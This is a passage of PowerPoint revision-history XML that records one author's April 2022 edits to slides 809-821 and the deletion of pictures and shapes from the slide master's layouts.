        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1473933393" sldId="809"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1473933393" sldId="809"/>
            <ac:spMk id="2" creationId="{EFD5DA13-B3C2-4871-AEB0-2E043B092FD1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1473933393" sldId="809"/>
            <ac:spMk id="3" creationId="{A1AEEEEF-EA3E-4FBA-99CA-9F0E2C28C8EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1473933393" sldId="809"/>
            <ac:spMk id="5" creationId="{C7260084-A936-4235-8163-0C00F70AA1C1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3844853889" sldId="810"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3844853889" sldId="810"/>
            <ac:spMk id="2" creationId="{17C8BFE1-AA29-47E8-99C3-613784912F89}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3844853889" sldId="810"/>
            <ac:spMk id="3" creationId="{68D85475-A905-419A-8CF2-93804DEE523A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3844853889" sldId="810"/>
            <ac:spMk id="5" creationId="{9AD7D0D1-1B4F-4552-8C65-69824E580E53}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="117177040" sldId="811"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="117177040" sldId="811"/>
            <ac:spMk id="2" creationId="{EA92CD6F-6198-4E9F-A48A-C752A2E50308}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="117177040" sldId="811"/>
            <ac:spMk id="3" creationId="{5074208C-ACF6-42FC-8A3C-BC0CE5175CAC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="117177040" sldId="811"/>
            <ac:spMk id="5" creationId="{2E819B86-54DB-4CB8-878D-DE9F046AC0E1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2123604206" sldId="812"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2123604206" sldId="812"/>
            <ac:spMk id="2" creationId="{1A8A6102-D0BD-40AC-BA8C-3597FE59B1AC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2123604206" sldId="812"/>
            <ac:spMk id="3" creationId="{3776DF36-2FF7-49D4-8B56-013FDC446120}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2123604206" sldId="812"/>
            <ac:spMk id="5" creationId="{D812A4DF-423C-42CD-8EC4-0AED71A15E4E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="825267465" sldId="813"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="825267465" sldId="813"/>
            <ac:spMk id="2" creationId="{068E2559-3CCD-4510-B53E-DC17B46434BD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="825267465" sldId="813"/>
            <ac:spMk id="3" creationId="{5373FCD3-263E-4B1F-9C18-10D31FD24086}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1483469802" sldId="814"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1483469802" sldId="814"/>
            <ac:spMk id="2" creationId="{8D2A4057-19D3-4BAF-80C3-194DEF953094}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1483469802" sldId="814"/>
            <ac:spMk id="6" creationId="{1583FD7D-90C4-4667-A548-153513AAC3EA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2673591280" sldId="815"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2673591280" sldId="815"/>
            <ac:spMk id="2" creationId="{9BB28F49-8E73-4F37-915B-22E80908C901}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2673591280" sldId="815"/>
            <ac:spMk id="3" creationId="{A5F9B1DA-7740-4A7C-8F7B-5894E8CC8AE6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2673591280" sldId="815"/>
            <ac:spMk id="5" creationId="{8885255A-E7A3-4BB2-A184-937FBE1726FA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2701696402" sldId="816"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2701696402" sldId="816"/>
            <ac:spMk id="2" creationId="{1C749161-1170-4A32-9830-B5E94681A04C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2701696402" sldId="816"/>
            <ac:spMk id="3" creationId="{0F5034A9-5451-4E3D-9172-018A73251F5C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2513518037" sldId="817"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2513518037" sldId="817"/>
            <ac:spMk id="2" creationId="{C4480616-CF66-4158-B8AD-EBE00568B89A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2513518037" sldId="817"/>
            <ac:spMk id="3" creationId="{08274058-D887-419A-97CB-0EA73F5CE266}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1854693332" sldId="818"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1854693332" sldId="818"/>
            <ac:spMk id="2" creationId="{071FD995-FAC6-494A-A4ED-6B4291B60DEA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1854693332" sldId="818"/>
            <ac:spMk id="3" creationId="{ADB7A666-7062-41B7-9D3D-5BA870DE417D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1854693332" sldId="818"/>
            <ac:spMk id="5" creationId="{12614071-A8DD-47DC-BA10-025E30B60237}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2590337750" sldId="819"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2590337750" sldId="819"/>
            <ac:spMk id="2" creationId="{F1B947B4-201A-4DA3-94C9-0052FC898E85}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2590337750" sldId="819"/>
            <ac:spMk id="3" creationId="{81AA4034-45AC-4520-8644-E3F025F09875}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2974628731" sldId="820"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2974628731" sldId="820"/>
            <ac:spMk id="2" creationId="{C6598083-0540-457F-BDAF-DC650AAF34CE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2974628731" sldId="820"/>
            <ac:spMk id="6" creationId="{9B0DCE3D-A620-4E49-BA85-C30023519BD6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1607812315" sldId="821"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1607812315" sldId="821"/>
            <ac:spMk id="2" creationId="{F8E31C96-02F2-4B39-A3D1-09E54AF6349A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1607812315" sldId="821"/>
            <ac:spMk id="5" creationId="{6DB0D3B1-F5AC-4D52-B425-613C9C48B4F5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldMasterChg chg="delSp mod modSldLayout">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:22.784" v="284" actId="6014"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
        </pc:sldMasterMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:03.028" v="6" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <ac:spMk id="7" creationId="{53724A7B-1CCF-7447-B0FA-CDCAC098C90A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:29:58.291" v="5" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <pc:sldLayoutMk cId="792993405" sldId="2147483668"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:29:58.291" v="5" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="792993405" sldId="2147483668"/>
              <ac:spMk id="11" creationId="{2B43BD34-27FE-427A-A283-6BD434AED49D}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:29:55.162" v="4" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="792993405" sldId="2147483668"/>
              <ac:spMk id="37" creationId="{C55AACF5-EF00-CB42-823A-B94F99F731DB}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:29:52.960" v="1" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="792993405" sldId="2147483668"/>
              <ac:picMk id="5" creationId="{2B952B70-437C-462C-AD52-0F77143BF82F}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:29:54.419" v="3" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="792993405" sldId="2147483668"/>
              <ac:picMk id="9" creationId="{CF182546-D092-4007-AC8E-7DB855065E6E}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:29:53.506" v="2" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="792993405" sldId="2147483668"/>
              <ac:picMk id="10" creationId="{EE35D647-412B-43F5-B738-2DBCD83BF2F6}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:07.954" v="7" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <pc:sldLayoutMk cId="461605393" sldId="2147483669"/>
          </pc:sldLayoutMkLst>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:07.954" v="7" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="461605393" sldId="2147483669"/>
              <ac:picMk id="4" creationId="{62496D60-6A52-48ED-A36D-59816AB37F3E}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:09.163" v="8" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <pc:sldLayoutMk cId="4250492290" sldId="2147483670"/>
          </pc:sldLayoutMkLst>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:09.163" v="8" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="4250492290" sldId="2147483670"/>
              <ac:picMk id="7" creationId="{CB7C18C8-DB61-4BC6-8ECE-0A8290898980}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:11.642" v="10" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <pc:sldLayoutMk cId="2038811703" sldId="2147483671"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:11.642" v="10" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="2038811703" sldId="2147483671"/>
              <ac:spMk id="26" creationId="{3051A866-DE6C-844B-BBB6-8FAE73A09746}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:10.362" v="9" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="2038811703" sldId="2147483671"/>
              <ac:picMk id="20" creationId="{EE91E640-6B77-4909-B48E-5B059D96CC3C}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:14.922" v="12" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <pc:sldLayoutMk cId="2840037472" sldId="2147483672"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
